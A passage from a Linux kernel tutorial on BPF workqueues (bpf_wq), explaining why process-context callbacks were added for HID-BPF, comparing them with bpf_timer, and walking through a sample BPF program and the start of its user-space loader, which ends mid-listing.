&lt;p&gt;This limitation became a real problem for Benjamin Tissoires at Red Hat when he was developing HID-BPF in 2023. HID devices (keyboards, mice, tablets, game controllers) frequently need operations that timers simply can't handle. Imagine implementing keyboard macro functionality where pressing F1 types "hello" - you need 10ms delays between each keystroke for the system to properly process events. Or consider a device with buggy firmware that needs re-initialization after system wake - you must send commands and wait for hardware responses. Timer callbacks in softirq context can't do any of this.&lt;/p&gt;

&lt;p&gt;As Benjamin Tissoires explained in his kernel patches: "I need something similar to bpf_timers, but not in soft IRQ context... the bpf_timer functionality would prevent me to kzalloc and wait for the device."&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Process Context Execution
&lt;/h3&gt;

&lt;p&gt;In early 2024, Benjamin proposed and developed &lt;strong&gt;bpf_wq&lt;/strong&gt; - essentially "bpf_timer but in process context instead of softirq." The kernel community merged it in April 2024, and it is available in Linux v6.10 and later. The key insight is simple but powerful: by running callbacks in process context (through the kernel's workqueue infrastructure), BPF programs gain access to the full range of kernel operations.&lt;/p&gt;
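
&lt;p&gt;Because &lt;code&gt;bpf_wq&lt;/code&gt; needs a recent kernel, it can help to check for it before building. The sketch below assumes that the &lt;code&gt;bpf_wq_init&lt;/code&gt; kfunc used later in this tutorial shows up as a symbol in &lt;code&gt;/proc/kallsyms&lt;/code&gt; on kernels that support workqueues. The helper name &lt;code&gt;has_symbol&lt;/code&gt; is hypothetical.&lt;/p&gt;

```shell
#!/bin/sh
# has_symbol NAME FILE: succeed when NAME appears as a whole word in FILE.
has_symbol() {
    grep -qw -- "$1" "$2" 2>/dev/null
}

# Look for the workqueue kfunc in the running kernel's symbol table.
if has_symbol bpf_wq_init /proc/kallsyms; then
    echo "bpf_wq kfuncs found"
else
    echo "bpf_wq kfuncs not found; a kernel with bpf_wq support is needed"
fi
```

&lt;p&gt;A missing symbol usually means the kernel predates the feature, in which case the example in this tutorial will fail to load.&lt;/p&gt;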

&lt;p&gt;Here's what changes with process context:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;bpf_timer (softirq)&lt;/th&gt;
&lt;th&gt;bpf_wq (process)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Can sleep?&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ No - will crash&lt;/td&gt;
&lt;td&gt;✅ Yes - safe to sleep&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Memory allocation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Limited flags only&lt;/td&gt;
&lt;td&gt;✅ Full &lt;code&gt;kzalloc()&lt;/code&gt; support&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Device I/O&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Cannot wait&lt;/td&gt;
&lt;td&gt;✅ Can wait for responses&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Blocking operations&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ Prohibited&lt;/td&gt;
&lt;td&gt;✅ Fully supported&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Latency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Very low (microseconds)&lt;/td&gt;
&lt;td&gt;Higher (milliseconds)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Use case&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Time-critical fast path&lt;/td&gt;
&lt;td&gt;Sleepable slow path&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Workqueues enable the classic "fast path + slow path" pattern. Your eBPF program handles performance-critical operations immediately in the fast path, then schedules expensive cleanup or I/O operations to run asynchronously in the slow path. The fast path stays responsive while the slow path gets the capabilities it needs.&lt;/p&gt;

&lt;h3&gt;
  
  
  Real-World Applications
&lt;/h3&gt;

&lt;p&gt;The applications span multiple domains. &lt;strong&gt;HID device handling&lt;/strong&gt; was the original motivation - injecting keyboard macros with timing delays, fixing broken device firmware dynamically without kernel drivers, re-initializing devices after wake from sleep, transforming input events on the fly. All these require sleepable operations that only workqueues can provide.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Network packet processing&lt;/strong&gt; benefits from async cleanup patterns. Your XDP program enforces rate limits and drops packets in the fast path (non-blocking), while a workqueue cleans up stale tracking entries in the background. This prevents memory leaks without impacting packet processing performance.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Security monitoring&lt;/strong&gt; can apply fast rules immediately, then use workqueues to query reputation databases or external threat intelligence services. The fast path makes instant decisions while the slow path updates policies based on complex analysis.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Resource cleanup&lt;/strong&gt; defers expensive operations. Instead of blocking the main code path while freeing memory, closing connections, or compacting data structures, you schedule a workqueue to handle cleanup in the background.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation: Simple Workqueue Test
&lt;/h2&gt;

&lt;p&gt;Let's build a complete example that demonstrates the workqueue lifecycle. We'll create a program that triggers on the &lt;code&gt;unlink&lt;/code&gt; syscall, schedules async work, and verifies that both the main path and workqueue callback execute correctly.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete BPF Program: wq_simple.bpf.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Simple BPF workqueue example */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"bpf_experimental.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* Element with embedded workqueue */&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_wq&lt;/span&gt; &lt;span class="n"&gt;work&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="cm"&gt;/* Array to store our element */&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;array&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="cm"&gt;/* Result variables */&lt;/span&gt;
&lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;wq_executed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;main_executed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* Workqueue callback - runs asynchronously in workqueue context */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;wq_callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;map&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="cm"&gt;/* This runs later in workqueue context */&lt;/span&gt;
    &lt;span class="n"&gt;wq_executed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="cm"&gt;/* Modify the value asynchronously */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Main program - schedules work */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"fentry/do_unlinkat"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;test_workqueue&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="n"&gt;init&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_wq&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;wq&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;main_executed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Initialize element in map */&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;init&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Get element from map */&lt;/span&gt;
    &lt;span class="n"&gt;val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Initialize workqueue */&lt;/span&gt;
    &lt;span class="n"&gt;wq&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;val&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;work&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_wq_init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;wq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Set callback function */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_wq_set_callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;wq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;wq_callback&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Schedule work to run asynchronously */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_wq_start&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;wq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the BPF Code
&lt;/h3&gt;

&lt;p&gt;The program demonstrates the complete workqueue workflow from initialization through async execution. We start by defining a structure that embeds a workqueue. The &lt;code&gt;struct elem&lt;/code&gt; contains both application data (&lt;code&gt;value&lt;/code&gt;) and the workqueue handle (&lt;code&gt;struct bpf_wq work&lt;/code&gt;). This embedding pattern is critical - the workqueue infrastructure needs to know which map contains the workqueue structure, and embedding it in the map value establishes this relationship.&lt;/p&gt;

&lt;p&gt;Our map is a simple array with one entry, chosen for simplicity in this example. In production code, you'd typically use hash maps to track multiple entities, each with its own embedded workqueue. The global variables &lt;code&gt;wq_executed&lt;/code&gt; and &lt;code&gt;main_executed&lt;/code&gt; serve as test instrumentation, letting userspace verify that both code paths ran.&lt;/p&gt;

&lt;p&gt;The workqueue callback shows the signature that all workqueue callbacks must follow: &lt;code&gt;int callback(void *map, int *key, void *value)&lt;/code&gt;. The kernel invokes this function asynchronously in process context, passing the map containing the workqueue, the key of the entry, and a pointer to the value. This signature gives the callback full context about which element triggered it and access to the element's data. Our callback sets &lt;code&gt;wq_executed = 1&lt;/code&gt; to prove it ran, and modifies &lt;code&gt;val-&amp;gt;value = 42&lt;/code&gt; to demonstrate that async modifications persist in the map.&lt;/p&gt;

&lt;p&gt;The main program attached to &lt;code&gt;fentry/do_unlinkat&lt;/code&gt; triggers whenever the &lt;code&gt;unlink&lt;/code&gt; syscall executes. This gives us an easy way to activate the program - userspace just needs to delete a file. We set &lt;code&gt;main_executed = 1&lt;/code&gt; immediately to mark the synchronous path. Then we initialize an element and store it in the map using &lt;code&gt;bpf_map_update_elem()&lt;/code&gt;. This is necessary because the workqueue must be embedded in a map entry.&lt;/p&gt;

&lt;p&gt;The workqueue initialization follows a three-step sequence. First, &lt;code&gt;bpf_wq_init(wq, &amp;amp;array, 0)&lt;/code&gt; initializes the workqueue handle, passing the map that contains it. The verifier uses this information to validate that the workqueue and its container are properly related. Second, &lt;code&gt;bpf_wq_set_callback(wq, wq_callback, 0)&lt;/code&gt; registers our callback function. The verifier checks that the callback has the correct signature. Third, &lt;code&gt;bpf_wq_start(wq, 0)&lt;/code&gt; schedules the workqueue to execute asynchronously. This call returns immediately - the main program continues executing while the kernel queues the work for later execution in process context.&lt;/p&gt;

&lt;p&gt;The flags parameter in all three functions is reserved for future use and should be 0 in current kernels. The pattern allows future extensions without breaking API compatibility.&lt;/p&gt;
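
&lt;p&gt;Since the program hooks &lt;code&gt;fentry/do_unlinkat&lt;/code&gt;, deleting any file is enough to fire it. As a minimal sketch, the shell helper below triggers the hook by hand while the BPF program is loaded. The function name &lt;code&gt;trigger_unlink&lt;/code&gt; is hypothetical, and the tutorial's own loader may trigger the hook differently.&lt;/p&gt;

```shell
#!/bin/sh
# trigger_unlink: create a scratch file and delete it, which makes the
# kernel run its unlink path once. Prints the path that was removed.
trigger_unlink() {
    f=$(mktemp) || return 1
    rm -- "$f" || return 1
    echo "$f"
}

removed=$(trigger_unlink)
echo "created and removed $removed"
```

&lt;p&gt;The workqueue callback runs asynchronously, so allow a short delay after the deletion before checking &lt;code&gt;wq_executed&lt;/code&gt;.&lt;/p&gt;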

&lt;h3&gt;
  
  
  Complete User-Space Program: wq_simple.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Userspace test for BPF workqueue */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;fcntl.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;sys/resource.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"wq_simple.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;libbpf_print_level&lt;/span&gt; &lt;span class="n"&gt;level&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;va_list&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;vfprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;wq_simple_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;libbpf_set_print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Open and load BPF application */&lt;/span&gt;
    &lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;wq_simple_bpf__open_and_load&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to open and load BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Attach tracepoint handler */&lt;/span&gt;
    &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;wq_simple_bpf__attach&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to attach BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"BPF workqueue program attached. Triggering unlink syscall...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Create a temporary file to trigger do_unlinkat */&lt;/span&gt;
    &lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"/tmp/wq_test_file"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;O_CREAT&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;O_WRONLY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mo"&gt;0644&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
